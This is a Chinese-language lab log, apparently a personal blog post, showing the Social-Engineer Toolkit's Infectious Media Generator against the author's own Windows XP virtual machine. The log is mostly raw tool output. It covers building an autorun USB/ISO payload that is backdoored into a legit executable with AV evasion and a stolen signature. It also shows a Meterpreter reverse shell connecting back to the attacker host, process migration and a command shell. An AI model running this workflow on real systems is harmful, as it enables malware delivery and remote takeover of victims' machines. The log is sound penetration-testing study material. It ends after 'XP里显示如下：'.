Infectious Media Generator成功

刚才失败了，然后我把BT5虚拟机回退到先前的一个snapshot，然后再次操作，就成功了：

root@bt:~# cd /pentest/exploits/set/root@bt:/pentest/exploits/set# ./setCopyright 2012, The Social-Engineer Toolkit (SET) by TrustedSec, LLCAll rights reserved.Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:    * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.    * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer      in the documentation and/or other materials provided with the distribution.    * Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from      this software without specific prior written permission.THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOTLIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHTOWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOTLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANYTHEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OFTHIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where creditis due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you eversee the creator of SET in a bar, you are required to give him a hug and buy him a beer. Hug must last at least 5 seconds. Authorholds the right to refuse the hug or the beer.The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.Do you agree to the terms of service [y/n]: y             01011001011011110111010100100000011100             10011001010110000101101100011011000111             10010010000001101000011000010111011001             10010100100000011101000110111100100000             01101101011101010110001101101000001000             00011101000110100101101101011001010010             00000110111101101110001000000111100101             10111101110101011100100010000001101000             01100001011011100110010001110011001000             00001110100010110100101001001000000101             01000110100001100001011011100110101101             11001100100000011001100110111101110010             00100000011101010111001101101001011011             10011001110010000001110100011010000110             01010010000001010011011011110110001101             10100101100001011011000010110101000101             01101110011001110110100101101110011001             01011001010111001000100000010101000110             11110110111101101100011010110110100101             11010000100000001010100110100001110101             011001110111001100101010  [---]        The Social-Engineer Toolkit (SET)         [---]          [---]        Created by: David Kennedy (ReL1K)         [---]  [---]        Development Team: JR DePre (pr1me)        [---]  [---]        Development Team: Joey Furr (j0fer)       [---]  [---]        Development Team: Thomas Werth            [---]  [---]        Development Team: Garland                 [---]  [---]                  Version: 3.6                    [---]  [---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]  [---]        Report bugs: davek@trustedsec.com         [---]  [---]         Follow me on Twitter: dave_rel1k         [---]  [---]       Homepage: https://www.trustedsec.com       [---]   Welcome to the Social-Engineer Toolkit (SET). Your one    stop shop for all of your social-engineering needs..        Join us on irc.freenode.net in channel #setoolkit  The Social-Engineer Toolkit is a product of TrustedSec.           Visit: https://www.trustedsec.com Select from the menu:   1) Social-Engineering Attacks   2) Fast-Track Penetration Testing   3) Third Party Modules   4) Update the Metasploit Framework   5) Update the Social-Engineer Toolkit   6) Update SET configuration   7) Help, Credits, and About  99) Exit the Social-Engineer Toolkitset> 1             01011001011011110111010100100000011100             10011001010110000101101100011011000111             10010010000001101000011000010111011001             10010100100000011101000110111100100000             01101101011101010110001101101000001000             00011101000110100101101101011001010010             00000110111101101110001000000111100101             10111101110101011100100010000001101000             01100001011011100110010001110011001000             00001110100010110100101001001000000101             01000110100001100001011011100110101101             11001100100000011001100110111101110010             00100000011101010111001101101001011011             10011001110010000001110100011010000110             01010010000001010011011011110110001101             10100101100001011011000010110101000101             01101110011001110110100101101110011001             01011001010111001000100000010101000110             11110110111101101100011010110110100101             11010000100000001010100110100001110101             011001110111001100101010  [---]        The Social-Engineer Toolkit (SET)         [---]          [---]        Created by: David Kennedy (ReL1K)         [---]  [---]        Development Team: JR DePre (pr1me)        [---]  [---]        Development Team: Joey Furr (j0fer)       [---]  [---]        Development Team: Thomas Werth            [---]  [---]        Development Team: Garland                 [---]  [---]                  Version: 3.6                    [---]  [---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]  [---]        Report bugs: davek@trustedsec.com         [---]  [---]         Follow me on Twitter: dave_rel1k         [---]  [---]       Homepage: https://www.trustedsec.com       [---]   Welcome to the Social-Engineer Toolkit (SET). Your one    stop shop for all of your social-engineering needs..        Join us on irc.freenode.net in channel #setoolkit  The Social-Engineer Toolkit is a product of TrustedSec.           Visit: https://www.trustedsec.com Select from the menu:   1) Spear-Phishing Attack Vectors   2) Website Attack Vectors   3) Infectious Media Generator   4) Create a Payload and Listener   5) Mass Mailer Attack   6) Arduino-Based Attack Vector   7) SMS Spoofing Attack Vector   8) Wireless Access Point Attack Vector   9) QRCode Generator Attack Vector  10) Powershell Attack Vectors  11) Third Party Modules  99) Return back to the main menu.set> 3 The Infectious USB/CD/DVD module will create an autorun.inf file and a Metasploit payload. When the DVD/USB/CD is inserted, it will automatically run if autorun is enabled. Pick the attack vector you wish to use: fileformat bugs or a straight executable.   1) File-Format Exploits   2) Standard Metasploit Executable  99) Return to Main Menuset:infectious>2set:payloads> Enter the IP address for the payload (reverse):192.168.1.11What payload do you want to generate:  Name:                                       Description:   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system   5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline   6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline   7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter   8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports   9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter  10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and spawn Meterpreter  11) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET  12) SE Toolkit HTTP Reverse Shell           Purely native HTTP shell with AES encryption support  13) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP  14) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec (A/V Safe)  15) Import your own executable              Specify a path for your own executableset:payloads>2Below is a list of encodings to try and bypass AV. Select one of the below, 'backdoored executable' is typically the best.   1) avoid_utf8_tolower (Normal)   2) shikata_ga_nai (Very Good)   3) alpha_mixed (Normal)   4) alpha_upper (Normal)   5) call4_dword_xor (Normal)   6) countdown (Normal)   7) fnstenv_mov (Normal)   8) jmp_call_additive (Normal)   9) nonalpha (Normal)  10) nonupper (Normal)  11) unicode_mixed (Normal)  12) unicode_upper (Normal)  13) alpha2 (Normal)  14) No Encoding (None)  15) Multi-Encoder (Excellent)  16) Backdoored Executable (BEST)set:encoding>16set:payloads> PORT of the listener [443]:[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...[*] Backdoor completed successfully. Payload is now hidden within a legit executable.[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.[-] Packing the executable and obfuscating PE file randomly, one moment.[*] Digital Signature Stealing is ON, hijacking a legit digital certificate[*] Your attack has been created in the SET home directory folder 'autorun'[-] Copy the contents of the folder to a CD/DVD/USB to autorun[-] The payload can be found in the SET home directory.set> Start the listener now? [yes|no]: yes[-] Please wait while the Metasploit listener is loaded...[-] ***[-] * WARNING: Database support has been disabled[-] ***                 _---------.             .' #######   ;."  .---,.    ;@             @@`;   .---,..." @@@@@'.,'@@            @@@@@',.'@@@@ ".'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'     "--'.@@@  -.@        @ ,'-   .'--"          ".@' ; @       @ `.  ;'            |@@@@ @@@     @    .             ' @@@ @@   @@    ,              `.@@@@    @@   .                ',@@     @   ;           _____________                 (   3 C    )     /|___ / Metasploit! \                 ;@'. __*__,."    \|--- \_____________/                  '(.,...."/       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]+ -- --=[ 927 exploits - 499 auxiliary - 151 post+ -- --=[ 251 payloads - 28 encoders - 8 nops[*] Processing src/program_junk/meta_config for ERB directives.resource (src/program_junk/meta_config)> use exploit/multi/handlerresource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpresource (src/program_junk/meta_config)> set LHOST 0.0.0.0LHOST => 0.0.0.0resource (src/program_junk/meta_config)> set LPORT 443LPORT => 443resource (src/program_junk/meta_config)> set ExitOnSession falseExitOnSession => falseresource (src/program_junk/meta_config)> set AutoRunScript migrate -fAutoRunScript => migrate -fresource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.msf  exploit(handler) > [*] Started reverse handler on 0.0.0.0:443[*] Starting the payload handler...

我把制作的iso文件，导入到XP虚拟机里，成功获得一个反向连接：

[*] Sending stage (752128 bytes) to 192.168.1.142[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.142:1044) at 2013-04-28 03:49:03 -0400[*] Session ID 1 (192.168.1.11:443 -> 192.168.1.142:1044) processing AutoRunScript 'migrate -f'[*] Current server process: program.exe (128)[*] Spawning notepad.exe process to migrate to[+] Migrating to 1620[+] Successfully migrated to process 

然后获得shell：

msf  exploit(handler) > sessions -lActive sessions===============  Id  Type                   Information                                      Connection  --  ----                   -----------                                      ----------  1   meterpreter x86/win32  ROOT-9743DD32E3\Administrator @ ROOT-9743DD32E3  192.168.1.11:443 -> 192.168.1.142:1044 (192.168.1.142)msf  exploit(handler) > sessions -i 1[*] Starting interaction with 1...meterpreter > sysinfoComputer        : ROOT-9743DD32E3OS              : Windows XP (Build 2600, Service Pack 3).Architecture    : x86System Language : zh_CNMeterpreter     : x86/win32meterpreter > shellProcess 168 created.Channel 1 created.Microsoft Windows XP [版本 5.1.2600](C) 版权所有 1985-2001 Microsoft Corp.D:\>dirdir 驱动器 D 中的卷是 20130629_225554 卷的序列号是 8C1E-0534 D:\ 的目录2013-04-28  15:42                46 autorun.inf2013-04-28  15:42           222,592 program.exe               2 个文件        222,638 字节               0 个目录              0 可用字节D:\>

成功了。

XP里显示如下：